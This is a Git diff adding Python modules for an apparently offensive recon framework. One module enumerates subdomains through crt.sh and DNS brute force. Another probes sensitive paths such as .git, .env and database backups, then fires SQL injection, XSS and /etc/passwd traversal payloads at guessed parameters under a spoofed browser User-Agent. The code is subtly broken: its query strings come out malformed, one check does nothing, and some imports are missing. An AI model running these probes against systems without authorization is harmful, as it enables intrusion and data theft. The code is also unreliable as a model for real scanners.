||||
from typing import Dict, List, Set
|
||||
import re
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class SubdomainFinder:
|
||||
"""
|
||||
A class for finding subdomains of a given domain.
|
||||
Uses Certificate Transparency logs, DNS brute-forcing, and common patterns.
|
||||
"""
|
||||
def __init__(self, config: Dict):
|
||||
"""
|
||||
Initializes the SubdomainFinder.
|
||||
|
||||
Args:
|
||||
config (Dict): The configuration dictionary for the framework.
|
||||
"""
|
||||
self.config = config
|
||||
self.common_subdomains = [
|
||||
'www', 'mail', 'ftp', 'localhost', 'webmail', 'smtp', 'pop', 'ns1', 'ns2',
|
||||
'webdisk', 'ns', 'cpanel', 'whm', 'autodiscover', 'autoconfig', 'test',
|
||||
'dev', 'staging', 'api', 'admin', 'portal', 'beta', 'demo', 'vpn',
|
||||
'blog', 'shop', 'store', 'forum', 'support', 'm', 'mobile', 'cdn',
|
||||
'static', 'assets', 'img', 'images', 'git', 'jenkins', 'jira'
|
||||
]
|
||||
logger.info("SubdomainFinder initialized")
|
||||
|
||||
def find(self, target: str) -> List[str]:
|
||||
"""
|
||||
Finds subdomains for a given domain using multiple techniques.
|
||||
|
||||
Args:
|
||||
target (str): The domain name to search subdomains for.
|
||||
|
||||
Returns:
|
||||
List[str]: A list of found subdomains.
|
||||
"""
|
||||
logger.info(f"Starting subdomain enumeration for {target}")
|
||||
|
||||
# Remove protocol if present
|
||||
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
|
||||
|
||||
found_subdomains: Set[str] = set()
|
||||
|
||||
# Method 1: Certificate Transparency logs
|
||||
ct_subdomains = self._check_crtsh(domain)
|
||||
found_subdomains.update(ct_subdomains)
|
||||
|
||||
# Method 2: Common subdomain brute-forcing
|
||||
brute_subdomains = self._brute_force_common(domain)
|
||||
found_subdomains.update(brute_subdomains)
|
||||
|
||||
result = sorted(list(found_subdomains))
|
||||
logger.info(f"Found {len(result)} subdomains for {domain}")
|
||||
return result
|
||||
|
||||
def _check_crtsh(self, domain: str) -> List[str]:
|
||||
"""
|
||||
Query Certificate Transparency logs via crt.sh
|
||||
"""
|
||||
subdomains = []
|
||||
try:
|
||||
url = f"https://crt.sh/?q=%.{domain}&output=json"
|
||||
logger.info(f"Querying crt.sh for {domain}")
|
||||
|
||||
response = requests.get(url, timeout=15)
|
||||
if response.status_code == 200:
|
||||
data = response.json()
|
||||
|
||||
for entry in data:
|
||||
name_value = entry.get('name_value', '')
|
||||
# Split by newlines (crt.sh returns multiple names per entry sometimes)
|
||||
names = name_value.split('\n')
|
||||
for name in names:
|
||||
name = name.strip().lower()
|
||||
# Remove wildcards
|
||||
name = name.replace('*.', '')
|
||||
# Only include valid subdomains for this domain
|
||||
if name.endswith(domain) and name != domain:
|
||||
subdomains.append(name)
|
||||
|
||||
logger.info(f"Found {len(subdomains)} subdomains from crt.sh")
|
||||
else:
|
||||
logger.warning(f"crt.sh returned status code {response.status_code}")
|
||||
|
||||
except requests.RequestException as e:
|
||||
logger.warning(f"Error querying crt.sh: {e}")
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error in crt.sh query: {e}")
|
||||
|
||||
return list(set(subdomains)) # Remove duplicates
|
||||
|
||||
def _brute_force_common(self, domain: str) -> List[str]:
|
||||
"""
|
||||
Brute-force common subdomain names
|
||||
"""
|
||||
found = []
|
||||
logger.info(f"Brute-forcing common subdomains for {domain}")
|
||||
|
||||
for subdomain in self.common_subdomains:
|
||||
full_domain = f"{subdomain}.{domain}"
|
||||
if self._check_subdomain_exists(full_domain):
|
||||
found.append(full_domain)
|
||||
logger.debug(f"Found subdomain: {full_domain}")
|
||||
|
||||
logger.info(f"Found {len(found)} subdomains via brute-force")
|
||||
return found
|
||||
|
||||
def _check_subdomain_exists(self, subdomain: str) -> bool:
|
||||
"""
|
||||
Check if a subdomain exists by attempting to resolve it
|
||||
"""
|
||||
try:
|
||||
socket.gethostbyname(subdomain)
|
||||
return True
|
||||
except socket.gaierror:
|
||||
return False
|
||||
except Exception as e:
|
||||
logger.debug(f"Error checking {subdomain}: {e}")
|
||||
return False
|
||||
Executable
+1
@@ -0,0 +1 @@
|
||||
from .web_recon import WebRecon
|
||||
Executable
+185
@@ -0,0 +1,185 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
WebRecon - A tool for web reconnaissance and basic vulnerability scanning.
|
||||
"""
|
||||
import requests
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
from urllib.parse import urljoin, urlencode # Added urlencode
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class WebRecon:
|
||||
"""
|
||||
A class for performing basic web reconnaissance and simple vulnerability checks.
|
||||
"""
|
||||
def __init__(self, config: Dict):
|
||||
"""
|
||||
Initializes the WebRecon tool.
|
||||
|
||||
Args:
|
||||
config (Dict): The configuration dictionary for the framework.
|
||||
"""
|
||||
self.config = config
|
||||
# Expanded wordlist for discovering common paths
|
||||
self.wordlist = [
|
||||
"admin", "login", "dashboard", "api", "robots.txt", "sitemap.xml",
|
||||
"test", "dev", "backup", "v1", "v2", "v3", ".git", ".env", "config.php",
|
||||
"phpinfo.php", "index.php", "main.php", "home.php", "portal.php",
|
||||
"upload", "files", "images", "assets", "downloads", "includes",
|
||||
"src", "backup.zip", "data.sql", "admin.bak", "panel"
|
||||
]
|
||||
self.headers = {
|
||||
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
|
||||
}
|
||||
self.test_parameters = ["id", "page", "cat", "item", "view", "name", "query", "search"] # Added for vulnerability testing
|
||||
|
||||
def analyze(self, target: str) -> Dict:
|
||||
"""
|
||||
Analyzes a web target to find common directories, files, and basic vulnerabilities.
|
||||
|
||||
Args:
|
||||
target (str): The base URL to analyze. It should include the scheme (http/https).
|
||||
|
||||
Returns:
|
||||
Dict: A dictionary containing the findings including discovered paths and vulnerabilities.
|
||||
"""
|
||||
logger.info(f"Starting web reconnaissance and basic vulnerability scan on {target}")
|
||||
findings = {
|
||||
"target": target,
|
||||
"status_code": None,
|
||||
"headers": {},
|
||||
"discovered_paths": [],
|
||||
"vulnerabilities": [] # New key for vulnerabilities
|
||||
}
|
||||
|
||||
if not target.startswith(('http://', 'https://')):
|
||||
target = f"http://{target}"
|
||||
logger.info(f"No scheme provided. Defaulting to http: {target}")
|
||||
|
||||
# 1. Check base URL connectivity and headers
|
||||
try:
|
||||
response = requests.head(target, headers=self.headers, timeout=5, allow_redirects=True)
|
||||
findings["status_code"] = response.status_code
|
||||
findings["headers"] = dict(response.headers)
|
||||
logger.info(f"Target {target} is online. Status: {response.status_code}")
|
||||
except requests.RequestException as e:
|
||||
logger.error(f"Failed to connect to {target}: {e}")
|
||||
return {"error": f"Failed to connect to target: {e}"}
|
||||
|
||||
# 2. Discover common paths
|
||||
for path in self.wordlist:
|
||||
url_to_check = urljoin(target, path)
|
||||
try:
|
||||
res = requests.get(url_to_check, headers=self.headers, timeout=3, allow_redirects=False)
|
||||
if res.status_code >= 200 and res.status_code < 400:
|
||||
logger.info(f"Found path: {url_to_check} (Status: {res.status_code})")
|
||||
findings["discovered_paths"].append({
|
||||
"path": url_to_check,
|
||||
"status_code": res.status_code
|
||||
})
|
||||
except requests.RequestException:
|
||||
# Ignore connection errors for sub-paths
|
||||
continue
|
||||
|
||||
# 3. Perform basic vulnerability checks
|
||||
logger.info(f"Performing basic vulnerability checks on {target}")
|
||||
findings["vulnerabilities"].extend(self._check_sqli(target))
|
||||
findings["vulnerabilities"].extend(self._check_xss(target))
|
||||
findings["vulnerabilities"].extend(self._check_lfi(target))
|
||||
|
||||
logger.info(f"Web reconnaissance on {target} finished. Found {len(findings['discovered_paths'])} paths and {len(findings['vulnerabilities'])} vulnerabilities.")
|
||||
return findings
|
||||
|
||||
def _check_sqli(self, target: str) -> List[Dict]:
|
||||
"""Checks for basic SQL Injection vulnerabilities."""
|
||||
vulnerabilities = []
|
||||
sqli_payloads = ["'", " or 1=1-- -", " or 1=1#", "\" or 1=1-- -"]
|
||||
sqli_error_patterns = ["sql syntax", "mysql_fetch_array()", "error in your sql syntax", "warning: mysql", "unclosed quotation mark"]
|
||||
|
||||
for param in self.test_parameters:
|
||||
for payload in sqli_payloads:
|
||||
test_url = f"{target}?{param}={urlencode({'': payload})}"
|
||||
try:
|
||||
response = requests.get(test_url, headers=self.headers, timeout=5)
|
||||
for error_pattern in sqli_error_patterns:
|
||||
if error_pattern in response.text.lower():
|
||||
vulnerabilities.append({
|
||||
"type": "SQL Injection",
|
||||
"severity": "High",
|
||||
"url": test_url,
|
||||
"parameter": param,
|
||||
"payload": payload,
|
||||
"response_snippet": response.text[:200],
|
||||
"description": f"Potential SQL Injection via parameter '{param}' with payload '{payload}'"
|
||||
})
|
||||
logger.warning(f"Potential SQLi found: {test_url}")
|
||||
# Stop after first finding for this param/type
|
||||
break
|
||||
except requests.RequestException:
|
||||
continue
|
||||
return vulnerabilities
|
||||
|
||||
def _check_xss(self, target: str) -> List[Dict]:
|
||||
"""Checks for basic Cross-Site Scripting (XSS) vulnerabilities."""
|
||||
vulnerabilities = []
|
||||
xss_payloads = [
|
||||
"<script>alert(1)</script>",
|
||||
"<img src=x onerror=alert(1)>",
|
||||
"<svg onload=alert(1)>"
|
||||
]
|
||||
|
||||
for param in self.test_parameters:
|
||||
for payload in xss_payloads:
|
||||
test_url = f"{target}?{param}={urlencode({'': payload})}"
|
||||
try:
|
||||
response = requests.get(test_url, headers=self.headers, timeout=5)
|
||||
if payload.replace('alert(1)', 'alert(1)') in response.text or \
|
||||
payload in response.text: # Check for reflected payload
|
||||
vulnerabilities.append({
|
||||
"type": "Cross-Site Scripting (XSS)",
|
||||
"severity": "Medium",
|
||||
"url": test_url,
|
||||
"parameter": param,
|
||||
"payload": payload,
|
||||
"response_snippet": response.text[:200],
|
||||
"description": f"Potential XSS via parameter '{param}' with payload '{payload}'"
|
||||
})
|
||||
logger.warning(f"Potential XSS found: {test_url}")
|
||||
# Stop after first finding for this param/type
|
||||
break
|
||||
except requests.RequestException:
|
||||
continue
|
||||
return vulnerabilities
|
||||
|
||||
def _check_lfi(self, target: str) -> List[Dict]:
|
||||
"""Checks for basic Local File Inclusion (LFI) vulnerabilities."""
|
||||
vulnerabilities = []
|
||||
lfi_payloads = [
|
||||
"../../../../etc/passwd",
|
||||
"....//....//....//etc/passwd",
|
||||
"%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" # URL-encoded
|
||||
]
|
||||
lfi_patterns = ["root:x:", "daemon:x:", "bin:x:"] # Common patterns in /etc/passwd
|
||||
|
||||
for param in self.test_parameters:
|
||||
for payload in lfi_payloads:
|
||||
test_url = f"{target}?{param}={urlencode({'': payload})}"
|
||||
try:
|
||||
response = requests.get(test_url, headers=self.headers, timeout=5)
|
||||
if any(pattern in response.text for pattern in lfi_patterns):
|
||||
vulnerabilities.append({
|
||||
"type": "Local File Inclusion (LFI)",
|
||||
"severity": "High",
|
||||
"url": test_url,
|
||||
"parameter": param,
|
||||
"payload": payload,
|
||||
"response_snippet": response.text[:200],
|
||||
"description": f"Potential LFI via parameter '{param}' with payload '{payload}'"
|
||||
})
|
||||
logger.warning(f"Potential LFI found: {test_url}")
|
||||
# Stop after first finding for this param/type
|
||||
break
|
||||
except requests.RequestException:
|
||||
continue
|
||||
return vulnerabilities
|
||||
Reference in New Issue
Block a user